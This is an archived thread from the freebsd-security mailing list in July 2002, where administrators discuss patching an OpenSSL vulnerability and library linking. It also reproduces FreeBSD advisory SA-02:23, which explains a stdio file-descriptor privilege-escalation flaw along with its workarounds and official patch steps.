
kind regards Dirk

- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany -
[dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

From owner-freebsd-security Tue Jul 30 11: 6: 0 2002
Received: from gate.dinoex.sub.org (dinoex@localhost) by
 net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6UI5C9K014942 for ; Tue, 30 Jul 2002 20:05:12 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
To: freebsd-security@FreeBSD.ORG
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Subject: Re: Re[2]: About the openssl hole
Date: Tue, 30 Jul 2002 19:52:54 +0200
References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor>

Geir Råness wrote:
> But as many know, the port of openssl will
> not completely replace the core open ssl.
> (You could see this if you build mod_ssl)

apache13-modssl will see and use an installed
port of openssl in /usr/local

kind regards Dirk

- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany -
[dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

From owner-freebsd-security Tue Jul 30 11:15:55 2002
Date: Tue, 30 Jul 2002 20:16:16 +0200
From: Gabriel Ambuehl
Message-ID: <153119816671.20020730201616@buz.ch>
To: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Cc: freebsd-security@freebsd.org
Subject: Re[4]: About the openssl hole
References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor>

Hi Dirk Meyer, you wrote.

DM> Geir Råness wrote:
>> But as many know, the port of openssl will
>> not completely replace the core open ssl.
>> (You could see this if you build mod_ssl)
DM> apache13-modssl will see and use an installed
DM> port of openssl in /usr/local

What about OpenSSH? (I mean I could live without mod_ssl for a day...)

Regards,
Gabriel

From owner-freebsd-security Tue Jul 30 11:17:51 2002
Date: Tue, 30 Jul 2002 14:17:39 -0400
From: Scott Lambert
To: freebsd-security@FreeBSD.ORG
Subject: Re: Re[2]: About the openssl hole
Message-ID: <20020730181739.GA50219@laptop.lambertfam.org>
References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor>
On Tue, Jul 30, 2002 at 07:52:54PM +0200, Dirk Meyer wrote:
> Geir Råness wrote:
>
> > But as many know, the port of openssl will
> > not completely replace the core open ssl.
> > (You could see this if you build mod_ssl)
>
> apache13-modssl will see and use an installed
> port of openssl in /usr/local

But if you install the openssl port with -DOPENSSL_OVERWRITE_BASE, the
ports should simply see the "base" install of openssl and use it that
way, no?

Do openssl using programs need to be recompiled for library changes
between OpenSSL 0.9.6a and OpenSSL 0.9.6d? ssh, sendmail, postfix,
stunnel, various pop3 and imap daemons, apache, ....?

--
Scott Lambert                    KC5MLE                       Unix SysAdmin
lambert@lambertfam.org

From owner-freebsd-security Tue Jul 30 11:21:26 2002
Date: Tue, 30 Jul 2002 11:21:04 -0700 (PDT)
Message-Id: <200207301821.g6UIL4w2034041@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security
 Advisory FreeBSD-SA-02:23.stdio [REVISED]
Reply-To: security-advisories@freebsd.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-02:23.stdio                                      Security Advisory
                                                          The FreeBSD Project

Topic:          insecure handling of stdio file descriptors

Category:       core
Module:         kernel
Announced:      2002-04-22
Credits:        Joost Pol, Georgi Guninski
Affects:        All releases of FreeBSD up to and including 4.6-RELEASE
                4.6-STABLE prior to the correction date
Corrected:      2002-07-30 15:40:46 UTC (RELENG_4)
                2002-07-30 15:42:11 UTC (RELENG_4_6)
                2002-07-30 15:42:46 UTC (RELENG_4_5)
                2002-07-30 15:43:17 UTC (RELENG_4_4)
FreeBSD only:   NO

0.   Revision History

v1.0  2002-04-22  Initial release
v1.1  2002-04-23  Patch and revision numbers updated
v1.2  2002-07-29  procfs issue; updated patch

I.   Background

By convention, POSIX systems associate file descriptors 0, 1, and 2 with
standard input, standard output, and standard error, respectively.  Almost
all applications give these stdio file descriptors special significance,
such as writing error messages to standard error (file descriptor 2).

In new processes, all file descriptors are duplicated from the parent
process.  Unless these descriptors are marked close-on-exec, they retain
their state during an exec.

All POSIX systems assign file descriptors in sequential order, starting
with the lowest unused file descriptor.  For example, if a newly exec'd
process has file descriptors 0 and 1 open, but file descriptor 2 closed,
and then opens a file, the new file descriptor is guaranteed to be 2
(standard error).

II.  Problem Description

Some programs are set-user-id or set-group-id, and therefore run with
increased privileges.
If such a program is started with some of the stdio file descriptors
closed, the program may open a file and inadvertently associate it with
standard input, standard output, or standard error.  The program may then
read data from or write data to the file inappropriately.  If the file is
one that the user would normally not have privileges to open, this may
result in an opportunity for privilege escalation.

The original correction for this problem (corresponding to the first
revision of this advisory) contained an error.  Systems using procfs or
linprocfs could still be exploited.  The dates for the original,
incomplete correction were:

Corrected:      2002-04-21 13:06:45 UTC (RELENG_4)
                2002-04-21 13:08:57 UTC (RELENG_4_5)
                2002-04-21 13:10:51 UTC (RELENG_4_4)

III. Impact

Local users may gain superuser privileges.  It is known that the `keyinit'
set-user-id program is exploitable using this method.  There may be other
programs that are exploitable.

IV.  Workaround

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

None.  The set-user-id bit may be removed from `keyinit' using the
following command, but note that there may be other programs that can be
exploited.

  # chmod 0555 /usr/bin/keyinit

[FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later,
4.6-RELEASE, and 4.6-STABLE]

Unmount all instances of the procfs and linprocfs filesystems using the
umount(8) command:

  # umount -f -a -t procfs
  # umount -f -a -t linprocfs

V.   Solution

The kernel was modified to check file descriptors 0, 1, and 2 when
starting a set-user-ID or set-group-ID executable.  If any of these are
not in use, they will be redirected to /dev/null.

1) Upgrade your vulnerable system to 4.6-STABLE; or to any of the
RELENG_4_6 (4.6.1-RELEASE-p1), RELENG_4_5 (4.5-RELEASE-p10), or RELENG_4_4
(4.4-RELEASE-p17) security branches dated after the respective correction
dates.
2) To patch your present system:

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2.asc

[FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later,
4.6-RELEASE, and 4.6-STABLE]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
http://www.freebsd.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Path                                                             Revision
  Branch
- -------------------------------------------------------------------------
sys/sys/filedesc.h
  RELENG_4                                                     1.19.2.4
  RELENG_4_6                                                   1.19.2.4
  RELENG_4_5                                                   1.19.2.3.6.1
  RELENG_4_4                                                   1.19.2.3.4.1
sys/kern/kern_exec.c
  RELENG_4                                                     1.107.2.15
  RELENG_4_6                                                   1.107.2.14.2.1
  RELENG_4_5                                                   1.107.2.13.2.2
  RELENG_4_4                                                   1.107.2.8.2.3
sys/kern/kern_descrip.c
  RELENG_4                                                     1.81.2.12
  RELENG_4_6                                                   1.81.2.14
  RELENG_4_5                                                   1.81.2.9.2.2
  RELENG_4_4                                                   1.81.2.8.2.2
sys/conf/newvers.sh
  RELENG_4_6                                                   1.44.2.23.2.6
  RELENG_4_5                                                   1.44.2.20.2.11
  RELENG_4_4                                                   1.44.2.17.2.16
- -------------------------------------------------------------------------

VII.
References

PINE-CERT-20020401

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jul 30 12: 0:16 2002
Date: Tue, 30 Jul 2002 21:00:32 +0200
From: Gabriel Ambuehl
Message-ID: <121122473609.20020730210032@buz.ch>
To: freebsd-security@freebsd.org
Subject: OpenSSH not using libssl?

Hi,
I'm somewhat confused now.
I wanted to install the openssl port which worked out fine and tried to
figure out what I need to do to get openssh (which makes the whole thing a
disaster) to use the new lib so I went on and did:

# ldd /usr/sbin/sshd
/usr/sbin/sshd:
        libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000)
        libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000)
        libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000)
        libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000)
        libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000)
        libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000)
        libz.so.2 => /usr/lib/libz.so.2 (0x281a2000)
        libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000)
        libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000)
        libc.so.4 => /usr/lib/libc.so.4 (0x281c1000)

Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't
libssl show up (with stunnel, for one, it does, BTW stunnel will
automatically use /usr/local/lib/libssl upon a recompile)? Guess I
better wait until the CVS contains a fix for the base tree...

regards,
Gabriel

From owner-freebsd-security Tue Jul 30 12:15:14 2002
Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02FFF635@goofy.epylon.lan>
From: "DiCioccio, Jason"
To: 'Gabriel Ambuehl', freebsd-security@freebsd.org
Subject: RE: OpenSSH not using libssl?
Date: Tue, 30 Jul 2002 12:15:05 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

libcrypto is part of openssl.. Unless the vulnerability was only in
libssl? I don't think so though..

Cheers,
- -JD-

- -----Original Message-----
From: Gabriel Ambuehl [mailto:gaml@buz.ch]
Sent: Tuesday, July 30, 2002 12:01 PM
To: freebsd-security@freebsd.org
Subject: OpenSSH not using libssl?

Hi,
I'm somewhat confused now. I wanted to install the openssl port which
worked out fine and tried to figure out what I need to do to get
openssh (which makes the whole thing a disaster) to use the new lib so
I went on and did:

# ldd /usr/sbin/sshd
/usr/sbin/sshd:
        libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000)
        libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000)
        libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000)
        libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000)
        libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000)
        libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000)
        libz.so.2 => /usr/lib/libz.so.2 (0x281a2000)
        libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000)
        libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000)
        libc.so.4 => /usr/lib/libc.so.4 (0x281c1000)

Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't
libssl show up (with stunnel, for one, it does, BTW stunnel will
automatically use /usr/local/lib/libssl upon a recompile)? Guess I
better wait until the CVS contains a fix for the base tree...
regards,
Gabriel

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jul 30 12:16: 9 2002
Date: Tue, 30 Jul 2002 15:15:56 -0400
From: James Snow
To: Gabriel Ambuehl
Cc: freebsd-security@freebsd.org
Subject: Re: OpenSSH not using libssl?
Message-ID: <20020730151556.A44974@teardrop.org>
References: <121122473609.20020730210032@buz.ch>
In-Reply-To: <121122473609.20020730210032@buz.ch>; from gaml@buz.ch on Tue, Jul 30, 2002 at 09:00:32PM +0200

On Tue, Jul 30, 2002 at 09:00:32PM +0200, Gabriel Ambuehl wrote:
> # ldd /usr/sbin/sshd
> /usr/sbin/sshd:
...
>         libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000)
...
> Now what's up here? Isn't OpenSSH based on OpenSSL?
> If so, why doesn't
> libssl show up (with stunnel, for one, it does, BTW stunnel will
> automatically use /usr/local/lib/libssl upon a recompile)? Guess I
> better wait until the CVS contains a fix for the base tree...

I scratched my head at this initially as well. But if you build OpenSSL
from source, you'll see that it includes libcrypto. It's not as obvious in
the FreeBSD /usr/src tree because of the way that things are broken out.
(At least, it wasn't obvious to me; I may just be clueless)

Since OpenSSH is the only daemon I run that uses OpenSSL, I just ran the
patch from the original advisory in /usr/src/crypto/openssl, rebuilt
/usr/src/secure/lib/libcrypto, and bounced sshd. This may not have been
exactly the correct thing to do, but it seems to have worked out for me.

-Snow

From owner-freebsd-security Tue Jul 30 12:16:49 2002
Date: Tue, 30 Jul 2002 15:16:40 -0400
From: Zvezdan Petkovic
To: freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSH not using libssl?
Message-ID: <20020730151640.A31553@corona.cs.wm.edu>
References: <121122473609.20020730210032@buz.ch>
In-Reply-To: <121122473609.20020730210032@buz.ch>; from gaml@buz.ch on Tue, Jul 30, 2002 at 09:00:32PM +0200

On Tue, Jul 30, 2002 at 09:00:32PM +0200, Gabriel Ambuehl wrote:
> Hi,
> I'm somewhat confused now. I wanted to install the openssl port which
> worked out fine and tried to figure out what I need to do to get
> openssh (which makes the whole thing a disaster) to use the new lib so
> I went on and did:
> # ldd /usr/sbin/sshd
> /usr/sbin/sshd:
>         libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000)
>         libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000)
>         libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000)
>         libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000)

See this line?
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>         libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000)
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
This is the OpenSSL library!

>         libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000)
>         libz.so.2 => /usr/lib/libz.so.2 (0x281a2000)
>         libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000)
>         libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000)
>         libc.so.4 => /usr/lib/libc.so.4 (0x281c1000)
>
> Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't
> libssl show up (with stunnel, for one, it does, BTW stunnel will
> automatically use /usr/local/lib/libssl upon a recompile)? Guess I
> better wait until the CVS contains a fix for the base tree...
> -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:24:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7D1BA37B400 for ; Tue, 30 Jul 2002 12:24:29 -0700 (PDT) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id 4557043E65 for ; Tue, 30 Jul 2002 12:24:28 -0700 (PDT) (envelope-from michaelnottebrock@gmx.net) Received: (qmail 13838 invoked by uid 0); 30 Jul 2002 19:24:26 -0000 Received: from pd9003286.dip.t-dialin.net (HELO gmx.net) (217.0.50.134) by mail.gmx.net (mp011-rz3) with SMTP; 30 Jul 2002 19:24:26 -0000 Message-ID: <3D46E7ED.1040006@gmx.net> Date: Tue, 30 Jul 2002 21:24:29 +0200 From: Michael Nottebrock User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH not using libssl? References: <121122473609.20020730210032@buz.ch> X-Enigmail-Version: 0.61.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig7789364C55CCD822E38AA594" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following is an OpenPGP/MIME signed message created by Enigmail/Mozilla, following RFC 2440 and RFC 2015 --------------enig7789364C55CCD822E38AA594 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Gabriel Ambuehl wrote: > Hi, > I'm somewhat confused now. 
I wanted to install the openssl port which > worked out fine and tried to figure out what I need to do to get > openssh (which makes the whole thing a disaster) to use the new lib so > I went on and did: > # ldd /usr/sbin/sshd > /usr/sbin/sshd: > libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000) > libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000) > libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000) > libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000) > libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000) > libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000) > libz.so.2 => /usr/lib/libz.so.2 (0x281a2000) > libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000) > libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000) > libc.so.4 => /usr/lib/libc.so.4 (0x281c1000) > > Now what's up here? Isn't OpenSSH based on OpenSSL? It uses libcrypto, but it shouldn't be vulnerable. -- Michael Nottebrock "The circumstance ends uglily in the cruel result." - Babelfish --------------enig7789364C55CCD822E38AA594 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9RuftXhc68WspdLARAuKaAJ41F79l80Q2+/lmssxpGG8KTfEiAwCeOXLq iRlIoYzMvQ+p0Cvu2tA4nlQ= =siKk -----END PGP SIGNATURE----- --------------enig7789364C55CCD822E38AA594-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:55:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ADF7E37B400 for ; Tue, 30 Jul 2002 12:55:38 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id CCD2043E42 for ; Tue, 30 Jul 2002 12:55:36 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by 
net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6UJt95H026146 for ; Tue, 30 Jul 2002 21:55:11 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6UJt8b8026106 for ; Tue, 30 Jul 2002 21:55:08 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
To: freebsd-security@FreeBSD.ORG
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Organization: privat
Subject: Re: Re[2]: About the openssl hole
Date: Tue, 30 Jul 2002 21:49:12 +0200
X-Mailer: Dinoex 1.79
References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <20020730181739.GA50219@laptop.lambertfam.org>
X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94]
X-Accept-Language: de,en
X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12
X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail.
X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved.
X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster.
X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D
X-No-Archive: yes
X-ZC-VIA: 20020730000000S+2@dinoex.sub.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Scott Lambert wrote:
> But if you install the openssl port with -DOPENSSL_OVERWRITE_BASE, the
> ports should simply see the "base" install of openssl and use it that
> way, no?

There is a version bump.

> Do openssl using programs need to be recompiled for library changes
> between OpenSSL 0.9.6a and OpenSSL 0.9.6d?  ssh, sendmail, postfix,
> stunnel, various pop3 and imap daemons, apache, ....?

Yes, you need to rebuild them all, to link against the new libssl.so.3 / libcrypto.so.3, or apply the patch from the advisory in the base system. This will get you a modified libssl.so.2 / libcrypto.so.2.

kind regards Dirk

- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany -
[dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

From owner-freebsd-security Tue Jul 30 13: 4:53 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D421A37B400 for ; Tue, 30 Jul 2002 13:04:50 -0700 (PDT)
Received: from web11607.mail.yahoo.com (web11607.mail.yahoo.com [216.136.172.59]) by mx1.FreeBSD.org (Postfix) with SMTP id 64C1F43E4A for ; Tue, 30 Jul 2002 13:04:50 -0700 (PDT) (envelope-from holtor@yahoo.com)
Message-ID: <20020730195807.28306.qmail@web11607.mail.yahoo.com>
Received: from [24.191.164.44] by web11607.mail.yahoo.com via HTTP; Tue, 30 Jul 2002 12:58:07 PDT
Date: Tue, 30 Jul 2002 12:58:07 -0700 (PDT)
From: Holt Grendal
Subject: Fixing OpenSSL Properly
To: security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

While we wait for the base openssl version to be upgraded to 0.9.6e (precisely why I hate having all this stuff in the base system!) what's the proper way to patch our systems?

I figure:

cd /usr/ports/security/openssl
make OPENSSL_OVERWRITE_BASE=YES install

Then rebuild libssh, mod_ssl, and anything else along with restarting sshd, apache and anything else?

Will this all work fine and dandy?
Holt __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 14:18:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AD86537B400 for ; Tue, 30 Jul 2002 14:18:09 -0700 (PDT) Received: from router.darlow.co.uk (pc2-bigg2-0-cust101.ltn.cable.ntl.com [213.107.35.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id B3E7C43E4A for ; Tue, 30 Jul 2002 14:18:08 -0700 (PDT) (envelope-from neil@darlow.co.uk) Received: from there (IDENT:1000@ideal.darlow.co.uk [192.168.0.2]) by router.darlow.co.uk (8.12.3/8.12.3) with SMTP id g6ULI6q5015864 for ; Tue, 30 Jul 2002 22:18:07 +0100 (BST) (envelope-from neil@darlow.co.uk) Message-Id: <200207302118.g6ULI6q5015864@router.darlow.co.uk> Content-Type: text/plain; charset="iso-8859-1" From: Neil Darlow To: freebsd-security@freebsd.org Subject: make buildworld after openssl/openssh-overwrite-base Date: Tue, 30 Jul 2002 22:18:03 +0100 X-Mailer: KMail [version 1.3.2] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, As part of the openssh panic I adopted the solution of installing the openssl and openssh ports using their overwrite-base feature. Subsequently I rebuilt all my ports that depended on openssl due to the major number change. Following the advice of adding NO_OPENSSL and NO_OPENSSH to my /etc/make.conf, I now find that programs like telnet with crypto support aren't built as part of make buildworld. How can I get a make buildworld to link such applications against the newly installed openssl-overwrite-base-0.9.6e port? 
I don't like the idea of building everything with base openssl and then installing openssl-0.9.6e to satisfy my rebuilt ports. Does anyone have a suggestion on how to handle this situation? Regards, Neil Darlow M.Sc. -- Say No to Software Patents -- Say No to TCPA -- Say No to Palladium ICQ: 135505456 E-Mail, Jabber, MSNM: neil@darlow.co.uk GnuPG Fingerprint: 359D B8FF 6273 6C32 BEAA 43F9 E579 E24A 531F 9048 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 15:26:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E8F2937B400 for ; Tue, 30 Jul 2002 15:26:32 -0700 (PDT) Received: from mail.npubs.com (npubs.com [207.111.208.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9166443E31 for ; Tue, 30 Jul 2002 15:26:32 -0700 (PDT) (envelope-from nielsen@memberwebs.com) From: "Nielsen" To: "Michael Nottebrock" Cc: References: <121122473609.20020730210032@buz.ch> <3D46E7ED.1040006@gmx.net> Subject: Re: OpenSSH not using libssl? MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020730222715.80CCA43C361@mail.npubs.com> Date: Tue, 30 Jul 2002 22:27:15 +0000 (GMT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think libcrypto has the ASN.1 bug. Nate ----- Original Message ----- > It uses libcrypto, but it shouldn't be vulnerable. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 16:10:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6CA937B400 for ; Tue, 30 Jul 2002 16:10:12 -0700 (PDT) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id C65E443E5E for ; Tue, 30 Jul 2002 16:10:11 -0700 (PDT) (envelope-from michaelnottebrock@gmx.net) Received: (qmail 8290 invoked by uid 0); 30 Jul 2002 23:10:10 -0000 Received: from pd9003286.dip.t-dialin.net (HELO gmx.net) (217.0.50.134) by mail.gmx.net (mp006-rz3) with SMTP; 30 Jul 2002 23:10:10 -0000 Message-ID: <3D471CD4.2010607@gmx.net> Date: Wed, 31 Jul 2002 01:10:12 +0200 From: Michael Nottebrock User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Nielsen Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH not using libssl? References: <121122473609.20020730210032@buz.ch> <3D46E7ED.1040006@gmx.net> <20020730222715.80CCA43C361@mail.npubs.com> X-Enigmail-Version: 0.61.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig94B1047890529B542E71C0E8" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following is an OpenPGP/MIME signed message created by Enigmail/Mozilla, following RFC 2440 and RFC 2015 --------------enig94B1047890529B542E71C0E8 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Nielsen wrote: > I think libcrypto has the ASN.1 bug. 
